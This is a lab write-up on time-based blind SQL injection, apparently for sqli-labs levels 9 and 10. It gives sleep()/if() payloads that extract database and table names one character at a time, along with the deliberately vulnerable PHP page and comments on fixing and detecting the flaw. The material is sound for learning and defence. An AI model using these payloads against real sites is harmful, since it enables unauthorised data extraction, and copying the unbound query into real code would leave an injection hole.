Less-9&10基于时间的盲注

基于时间的盲注
sleep()将执行程序挂起一段时间
if(参数1,参数2,参数3)：参数1为真时执行参数2，否则执行参数3。
-- Building blocks of the time-based technique this lab covers: MySQL sleep()
-- pauses the statement for the given number of seconds, and if(cond, a, b)
-- evaluates a only when cond is true, so a delay becomes the answer to a
-- yes/no question about the data even though the page body never changes.
-- Defender's view: the root cause is the unbound $id in the PHP below; bind the
-- value as a parameter (or cast a numeric id to an integer). For detection,
-- sleep()/benchmark() appearing in a request parameter, or a run of requests
-- whose latency differs by whole seconds, is the signal to alert on.
select sleep(3);
select if(database()='security',1,2);
-- The trailing "name" is only a column alias; the result set is irrelevant,
-- the elapsed time is the sole information channel.
select if(database()='security',sleep(5),NULL)name;
-- Same idea applied one character at a time (ascii(substr(...,1,1))) against
-- information_schema metadata; each request settles a single comparison.
select if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=100,sleep(5),NULL)name;

-- Less-9 shape: the parameter is concatenated into the statement unquoted.
select * from table where id = input
1 and select sleep(5)--+;
-- Less-10 shape: the parameter is placed inside single quotes (see the PHP
-- listing below), which is why the payloads for this level start with a quote;
-- "--+" turns the remainder of the original statement into a comment.
select * from table where id = 'input'

1' and select sleep(5) --+;


 (select if(ascii(substr(database(),1,1))>100,sleep(5),NULL))--+


1' and (select if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),NULL)name)--+

 
==> 可得到结果：条件成立时响应明显延迟，否则立即返回。

<?php
// Including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
// All PHP errors are suppressed: nothing about the query reaches the response,
// so the only observable channel left is how long the page takes to answer.
error_reporting(0);

// Take the variables.
if (isset($_GET['id'])) {
    $id = $_GET['id'];

    // Logging the connection parameters to a file for analysis.
    // $id is appended verbatim, so the log keeps every payload that was sent —
    // useful evidence when reviewing what this lab endpoint received.
    $fp = fopen('result.txt', 'a');
    fwrite($fp, 'ID:' . $id . "\n");
    fclose($fp);

    // Connectivity.
    // SINK: $id is interpolated straight into the statement inside single
    // quotes with no escaping, casting or binding — this is the injection
    // point the lab demonstrates. The fix is a bound parameter (or an integer
    // cast, since the id is expected to be numeric per the message below).
    $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result = mysql_query($sql);
    $row = mysql_fetch_array($result);
    if ($row) {
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        echo "<br>";
        echo "</font>";
    } else {
        // Same visible text as the success branch, and mysql_error() stays
        // commented out: the response content does not reveal whether the
        // query matched or failed, which is what makes this level "blind" —
        // only timing (sleep() in the injected text) leaks anything.
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";
        echo "</br></font>";
        echo '<font color= "#0000ff" font size= 3>';
    }
} else {
    echo "Please input the ID as parameter with numeric value";
}
?>
